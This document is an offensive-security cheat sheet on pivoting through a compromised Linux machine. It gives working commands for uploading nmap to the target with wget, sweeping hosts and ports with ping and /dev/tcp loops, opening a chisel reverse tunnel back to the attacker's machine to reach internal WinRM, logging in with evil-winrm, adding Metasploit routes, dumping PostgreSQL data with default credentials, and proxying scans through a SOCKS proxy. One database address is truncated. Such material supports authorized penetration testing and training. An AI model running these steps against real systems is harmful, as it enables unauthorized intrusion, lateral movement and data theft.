Pivoting in Linux

Accessing obtained over one machine to exploit another machine deeper in the network.

Enumerate Network in Remote Machine

After entering remote machine, we can enumerate and search other networks. Before that if the target machine does not have nmap, we can upload the binary to target machine.

# Linux 64-bit
wget https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/nmap

When we're ready, let's investigate the network as follow.

# ARP cache
arp -a

# Network hosts, ip addresses
cat /etc/hosts
cat /etc/resolv.conf
nmcli dev show

# Network ranges
nmap 10.0.0.1-255
nmap 172.17.0.1-255
for i in {1..255}; do (ping -c 1 10.0.0.${i} | grep "bytes from" &); done

# Port scan
nmap 10.0.0.2
nmap 172.17.0.2
for i in {1..65535}; do (echo > /dev/tcp/172.17.0.2/$i) >/dev/null 2>&1 && echo $i is open; done

Access to Not Directly Accessible Host

If we find host and port but cannot directly access from local machine, we can accomplish that by reverse port forwarding. For example, assume we found another host 172.16.22.2 and port 5985 in remote machine, then we want to connect the port on the host. Execute the following commands on each machine.

# In local machine
chisel server -p 9999 --reverse

# In remote machine
# replace "10.0.0.1" with your local ip address
chisel client 10.0.0.1:9999 R:5985:172.16.22.2:5985

Now we can access to 172.16.22.2:5985 from local machine as follow.

nmap -p 5985 localhost

# Result
PORT     STATE SERVICE
5985/tcp open  wsman

After that we can connect to the service.

evil-winrm -u username -p password -i localhost

For details, please refer to Port Forwarding with Chisel.

Basic Flow with Metasploit, Meterpreter

msfconsole
msf> use auxiliary/...
msf> run

msf> background

# Upgrade the latest session to meterpreter
msf> sessions -u -1
# Interact with the latest session (meterpreter)
msf> sessions -i -1

# Resolve the remote hostname to an ip address
meterpreter> resolve <variable>

# Background the meterpreter session
meterpreter> background

# Configure the routing table to the destination for 172.28.101.51 (outputted ip of the "resolve" command) to the latest opened session.
msf> route add 172.28.101.51/32 -1

# Configure the routing table to the other destination for 172.17.0.1 (e.g. written in /.dockerenv) to the latest opened session.
msf> route add 172.17.0.1/32 -1

# Print the routing table
msf> route print

After modifying the routing table, you can fetch information using the IP (e.g. 172.28.101.51) in msfconsole. For example:

# PostgreSQL
msf> use auxiliary/scanner/postgres/postgres_schemadump
msf> run postgres://postgres:postgres@172.28.101.51/postgres

msf> use auxiliary/admin/postgres/postgres_sql
msf> run postgres://postgres:postgres@172.28.101/postgres sql='select * from <table>'

• Socks Proxy

  It is an intermediate server that supports relaying networking traffic between two machines.

  msfconsole
  msf> use auxiliary/server/socks_proxy
  msf> run srvhost=127.0.0.1 srvport=9050 version=4a
  
  # Check if the socks proxy is running as a background job.
  msf> jobs
  # Stop the socks proxy
  msf> jobs -k <job-id>

  After that, you can use the localhost using tools like curl, proxychains.

  curl --proxy socks4a://localhost:9050 http://172.17.0.1 -v
  
  proxychains nmap 172.17.0.1
  proxychains ssh <user>@172.17.0.1